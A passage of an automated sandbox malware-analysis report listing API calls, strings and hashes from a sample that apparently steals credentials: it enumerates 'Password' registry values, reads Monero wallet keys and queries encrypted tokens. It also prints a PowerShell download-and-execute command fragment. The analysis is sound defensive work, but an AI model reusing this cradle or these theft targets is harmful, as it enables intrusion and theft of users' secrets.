                              • InternetCloseHandle.WININET(00000000), ref: 00C56260
                              Memory Dump Source: same dump set as above (Source File 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset 00C50000, based on PE: true; Snapshot File hcaresult_0_2_c50000_file.jbxd)
                              Similarity
                              • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                              • String ID:
                              • API String ID: 2507841554-0
                              • Opcode ID: 9677a1c309c1d6019ed1a4c9821b05923a0d646ec7ff432d925cfca5f79e0cb6
                              • Instruction ID: abcb3530c08e74321a85b6e36215385363b701d30c530b1260b50aa5a59b67d3
                              • Opcode Fuzzy Hash: 9677a1c309c1d6019ed1a4c9821b05923a0d646ec7ff432d925cfca5f79e0cb6
                              • Instruction Fuzzy Hash: B4517074A00208AFDB20DF91CC45BEE77B8EF04301F5081AAE605B71C1DB746A89CF99
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00C5733A
                              • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00C573B1
                              • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00C5740D
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00C57452
                              • HeapFree.KERNEL32(00000000), ref: 00C57459
                              • task.LIBCPMTD ref: 00C57555
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$EnumFreeOpenProcessValuetask
                              • String ID: Password
                              • API String ID: 775622407-3434357891
                              • Opcode ID: e16dd66b2b3c6124eff3ac49b5ea551d4f2acef9549beea8297f160dbd7f47c1
                              • Instruction ID: 40520e84742a144caec236e4ac4d4b2d313d2a7d0fcc6be549c11181ebfe881d
                              • Opcode Fuzzy Hash: e16dd66b2b3c6124eff3ac49b5ea551d4f2acef9549beea8297f160dbd7f47c1
                              • Instruction Fuzzy Hash: AA615DB58001189BDB24DB50DC45BDAB7B8BF44301F0081E9EA49A6141EF705FCDDFA5
                              APIs
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                                • Part of subcall function 00C6A9B0: lstrlen.KERNEL32(?,007F90E8,?,\Monero\wallet.keys,00C70E17), ref: 00C6A9C5
                                • Part of subcall function 00C6A9B0: lstrcpy.KERNEL32(00000000), ref: 00C6AA04
                                • Part of subcall function 00C6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C6AA12
                                • Part of subcall function 00C6A920: lstrcpy.KERNEL32(00000000,?), ref: 00C6A972
                                • Part of subcall function 00C6A920: lstrcat.KERNEL32(00000000), ref: 00C6A982
                                • Part of subcall function 00C6A8A0: lstrcpy.KERNEL32(?,00C70E17), ref: 00C6A905
                                • Part of subcall function 00C6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C6A7E6
                              • lstrlen.KERNEL32(00000000), ref: 00C5BC9F
                                • Part of subcall function 00C68E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C68E52
                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 00C5BCCD
                              • lstrlen.KERNEL32(00000000), ref: 00C5BDA5
                              • lstrlen.KERNEL32(00000000), ref: 00C5BDB9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                              • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                              • API String ID: 3073930149-1079375795
                              • Opcode ID: beb1c0eb39ed00d5dc38e705a296c6722d6338ea13dda55fd2a6b2ae68087203
                              • Instruction ID: 417402254424048c2051dcad7cb779080bf639f913372ecc4c95174ce06aafcf
                              • Opcode Fuzzy Hash: beb1c0eb39ed00d5dc38e705a296c6722d6338ea13dda55fd2a6b2ae68087203
                              • Instruction Fuzzy Hash: 04B12C729101089BDB24FBA0CDD6EEE7778AF58300F544169F506B7092EF346A49DFA2
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess$DefaultLangUser
                              • String ID: *
                              • API String ID: 1494266314-163128923
                              • Opcode ID: c812d72069bf16afe07b7f0b3265d6549b0aebdaf81ceb0264c598c6f1ba6fbc
                              • Instruction ID: ac0c4341be5cfb9f8a5511a7dfd0470455a978e236a78068907012ea8ad661dd
                              • Opcode Fuzzy Hash: c812d72069bf16afe07b7f0b3265d6549b0aebdaf81ceb0264c598c6f1ba6fbc
                              • Instruction Fuzzy Hash: 8AF08230904209EFD3549FE2E90A72C7BB0FF04703F0801ABF609A6290D6704B81DBD6
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00C54FCA
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00C54FD1
                              • InternetOpenA.WININET(00C70DDF,00000000,00000000,00000000,00000000), ref: 00C54FEA
                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00C55011
                              • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00C55041
                              • InternetCloseHandle.WININET(?), ref: 00C550B9
                              • InternetCloseHandle.WININET(?), ref: 00C550C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                              • String ID:
                              • API String ID: 3066467675-0
                              • Opcode ID: c62a7a449057e8de25374cde1e59bdf33b9e1700839e297e9084494ab5f7f94e
                              • Instruction ID: 9e9428018cae257d70e3ccdba7fdb4d30deca79b0a5ea888737edca22f12393d
                              • Opcode Fuzzy Hash: c62a7a449057e8de25374cde1e59bdf33b9e1700839e297e9084494ab5f7f94e
                              • Instruction Fuzzy Hash: A631FEB4A002189BDB20CF55DC85BDDB7B4EB48704F1081EAEA0977281D7706AC58F99
                              APIs
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00C68426
                              • wsprintfA.USER32 ref: 00C68459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00C6847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 00C6848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 00C68499
                                • Part of subcall function 00C6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C6A7E6
                              • RegQueryValueExA.ADVAPI32(00000000,007FE128,00000000,000F003F,?,00000400), ref: 00C684EC
                              • lstrlen.KERNEL32(?), ref: 00C68501
                              • RegQueryValueExA.ADVAPI32(00000000,007FDF48,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00C70B34), ref: 00C68599
                              • RegCloseKey.ADVAPI32(00000000), ref: 00C68608
                              • RegCloseKey.ADVAPI32(00000000), ref: 00C6861A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                              • String ID: %s\%s
                              • API String ID: 3896182533-4073750446
                              • Opcode ID: 465ace58a023656bb04559807e3d0abe39c703f804c2b1e479ea0ddb1c771093
                              • Instruction ID: 415d7b8ad540e562e0e1590dd8f6a94e06c471a92746e0ac9c751ad1bf5ef431
                              • Opcode Fuzzy Hash: 465ace58a023656bb04559807e3d0abe39c703f804c2b1e479ea0ddb1c771093
                              • Instruction Fuzzy Hash: EC21EA719102189FDB24DB54DC85FE9B3B8FF48700F04C5AAA609A6140DF71AA85CFD4
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C676A4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00C676AB
                              • RegOpenKeyExA.ADVAPI32(80000002,007EC0B8,00000000,00020119,00000000), ref: 00C676DD
                              • RegQueryValueExA.ADVAPI32(00000000,007FDF78,00000000,00000000,?,000000FF), ref: 00C676FE
                              • RegCloseKey.ADVAPI32(00000000), ref: 00C67708
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: Windows 11
                              • API String ID: 3225020163-2517555085
                              • Opcode ID: e0b3a8fcde489caa741a4a9ca2f16c4d8cbde719fbf986faefff1ce0408a9998
                              • Instruction ID: 5f9e716f4fdbcde307dc3350fa2c20a36b5908afbede01de25915a897bdbef44
                              • Opcode Fuzzy Hash: e0b3a8fcde489caa741a4a9ca2f16c4d8cbde719fbf986faefff1ce0408a9998
                              • Instruction Fuzzy Hash: 1D0144B5A04204BFDB10DBE5DD4DF6D77B8EF44705F144567FA04E7190D67099048B91
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C67734
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00C6773B
                              • RegOpenKeyExA.ADVAPI32(80000002,007EC0B8,00000000,00020119,00C676B9), ref: 00C6775B
                              • RegQueryValueExA.ADVAPI32(00C676B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00C6777A
                              • RegCloseKey.ADVAPI32(00C676B9), ref: 00C67784
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: CurrentBuildNumber
                              • API String ID: 3225020163-1022791448
                              • Opcode ID: fd8637a28e86adde849a9b5b99d8138deafb9d48fafa8a20d473b536e6d96be2
                              • Instruction ID: e5e924893077d5d67ee36411ebf2f6c69999174b73cc2cf1dc9866839babf9d1
                              • Opcode Fuzzy Hash: fd8637a28e86adde849a9b5b99d8138deafb9d48fafa8a20d473b536e6d96be2
                              • Instruction Fuzzy Hash: F8014FB5A40308BFDB10DBE1DC4AFAEB7B8EF48700F10456AFA05A7281DA705A048B91
                              APIs
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C599EC
                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C59A11
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00C59A31
                              • ReadFile.KERNEL32(000000FF,?,00000000,00C5148F,00000000), ref: 00C59A5A
                              • LocalFree.KERNEL32(00C5148F), ref: 00C59A90
                              • CloseHandle.KERNEL32(000000FF), ref: 00C59A9A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                              • String ID:
                              • API String ID: 2311089104-0
                              • Opcode ID: 198273fbe840b9cd41eeac0cfe48c0f5edc7a1418251e6b3e17869443c9ba194
                              • Instruction ID: f2892330a5641a94200e8222e0e0fa54347c264aaf1e8592b96a030e903ceb07
                              • Opcode Fuzzy Hash: 198273fbe840b9cd41eeac0cfe48c0f5edc7a1418251e6b3e17869443c9ba194
                              • Instruction Fuzzy Hash: 95316BB8A00209EFDB14CF95C885BAEB7F5FF48301F108199E811A7290C774AA85DFA5
                              APIs
                              • lstrcat.KERNEL32(?,007FE410), ref: 00C647DB
                                • Part of subcall function 00C68DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C68E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00C64801
                              • lstrcat.KERNEL32(?,?), ref: 00C64820
                              • lstrcat.KERNEL32(?,?), ref: 00C64834
                              • lstrcat.KERNEL32(?,007EB748), ref: 00C64847
                              • lstrcat.KERNEL32(?,?), ref: 00C6485B
                              • lstrcat.KERNEL32(?,007FDC80), ref: 00C6486F
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                                • Part of subcall function 00C68D90: GetFileAttributesA.KERNEL32(00000000,?,00C51B54,?,?,00C7564C,?,?,00C70E1F), ref: 00C68D9F
                                • Part of subcall function 00C64570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00C64580
                                • Part of subcall function 00C64570: RtlAllocateHeap.NTDLL(00000000), ref: 00C64587
                                • Part of subcall function 00C64570: wsprintfA.USER32 ref: 00C645A6
                                • Part of subcall function 00C64570: FindFirstFileA.KERNEL32(?,?), ref: 00C645BD
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                               • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                              • String ID:
                              • API String ID: 2540262943-0
                              • Opcode ID: 9550efe9071971d247041885f0aa2284289e2e22e4ed8c09d04af6644959d9da
                              • Instruction ID: 63c8dbcf1d141e57968e2a42fabca57c0e772af462ebd8b92d91d26e7a97db95
                              • Opcode Fuzzy Hash: 9550efe9071971d247041885f0aa2284289e2e22e4ed8c09d04af6644959d9da
                              • Instruction Fuzzy Hash: 143162B29002085BCB24FBB0DCCAEE97378AB58700F44459AB715A6081EE74978DDF95
                              APIs
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                                • Part of subcall function 00C6A9B0: lstrlen.KERNEL32(?,007F90E8,?,\Monero\wallet.keys,00C70E17), ref: 00C6A9C5
                                • Part of subcall function 00C6A9B0: lstrcpy.KERNEL32(00000000), ref: 00C6AA04
                                • Part of subcall function 00C6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C6AA12
                                • Part of subcall function 00C6A920: lstrcpy.KERNEL32(00000000,?), ref: 00C6A972
                                • Part of subcall function 00C6A920: lstrcat.KERNEL32(00000000), ref: 00C6A982
                                • Part of subcall function 00C6A8A0: lstrcpy.KERNEL32(?,00C70E17), ref: 00C6A905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00C62D85
                              Strings
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00C62D04
                              • ')", xrefs: 00C62CB3
                              • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00C62CC4
                              • <, xrefs: 00C62D39
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                               • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              • API String ID: 3031569214-898575020
                              • Opcode ID: 00472ecf996d4e48a97310d990cec80eb97162194183a5a499a7387a6a973304
                              • Instruction ID: ed33c5931b33aab031033360fe74806f6397c76a4e744fd989bba9c852bc88d3
                              • Opcode Fuzzy Hash: 00472ecf996d4e48a97310d990cec80eb97162194183a5a499a7387a6a973304
                              • Instruction Fuzzy Hash: B3419D71D102089ADB28FFA1C8D6BEDBB74AF14300F504129E516B71D2DF746A4ADF92
                              APIs
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00C59F41
                                • Part of subcall function 00C6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C6A7E6
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                               • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$AllocLocal
                              • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                              • API String ID: 4171519190-1096346117
                              • Opcode ID: 70c11f1fa11dec9bde9f3593113f574a97e27d7e79fa79a18f10a1a1c6020f2a
                              • Instruction ID: abdade6ca9cb3e626779611878347a4f38495dbe12a73849c074b4aed84bc747
                              • Opcode Fuzzy Hash: 70c11f1fa11dec9bde9f3593113f574a97e27d7e79fa79a18f10a1a1c6020f2a
                              • Instruction Fuzzy Hash: CE616D74A10208EFDB24EFA5CC96FED7775AF44300F008118FD0A6B192EB706A49DB96
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,007FDBC0,00000000,00020119,?), ref: 00C640F4
                              • RegQueryValueExA.ADVAPI32(?,007FE1D0,00000000,00000000,00000000,000000FF), ref: 00C64118
                              • RegCloseKey.ADVAPI32(?), ref: 00C64122
                              • lstrcat.KERNEL32(?,00000000), ref: 00C64147
                              • lstrcat.KERNEL32(?,007FE248), ref: 00C6415B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                               • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$CloseOpenQueryValue
                              • String ID:
                              • API String ID: 690832082-0
                              • Opcode ID: 61a4b5c653d9d6d411b06a8695ce7c15a3dfc63a0e4947a45da3f04e58199a05
                              • Instruction ID: 5ddaf4ff1b5f06baa7381f7d1df571e2408e915185521cd7e9fd3691dde39e96
                              • Opcode Fuzzy Hash: 61a4b5c653d9d6d411b06a8695ce7c15a3dfc63a0e4947a45da3f04e58199a05
                              • Instruction Fuzzy Hash: 78418CB6D001086BDB24EBA0DC8AFFD737DAB48300F44455ABA1557181EA755B8C9BE2
                              APIs
                              • GetSystemTime.KERNEL32(?), ref: 00C6696C
                              • sscanf.NTDLL ref: 00C66999
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00C669B2
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00C669C0
                              • ExitProcess.KERNEL32 ref: 00C669DA
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                               • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Time$System$File$ExitProcesssscanf
                              • String ID:
                              • API String ID: 2533653975-0
                              • Opcode ID: 641847d3fd865508737fff89660379738273d3e242713b4ab05f1b779aa02f39
                              • Instruction ID: 0bf66db934b839780dddbf1393f0b289296ce9ef6becb121c65aaac58dcd537a
                              • Opcode Fuzzy Hash: 641847d3fd865508737fff89660379738273d3e242713b4ab05f1b779aa02f39
                              • Instruction Fuzzy Hash: C121CD75D14208AFCF18EFE5D9459EEB7B5BF48300F04452AE416F3250EB345609CBA5
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C67E37
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00C67E3E
                              • RegOpenKeyExA.ADVAPI32(80000002,007EBF30,00000000,00020119,?), ref: 00C67E5E
                              • RegQueryValueExA.ADVAPI32(?,007FDA20,00000000,00000000,000000FF,000000FF), ref: 00C67E7F
                              • RegCloseKey.ADVAPI32(?), ref: 00C67E92
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                               • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 40a5647744fb2101c45fbb73d158a7e14f3fcbf069849a826de2040584609bf4
                              • Instruction ID: e8fb61e5ab5bfbef76e3ad74fed09a76a0ab1ac8e993d6fd0a7c7b8306c7f223
                              • Opcode Fuzzy Hash: 40a5647744fb2101c45fbb73d158a7e14f3fcbf069849a826de2040584609bf4
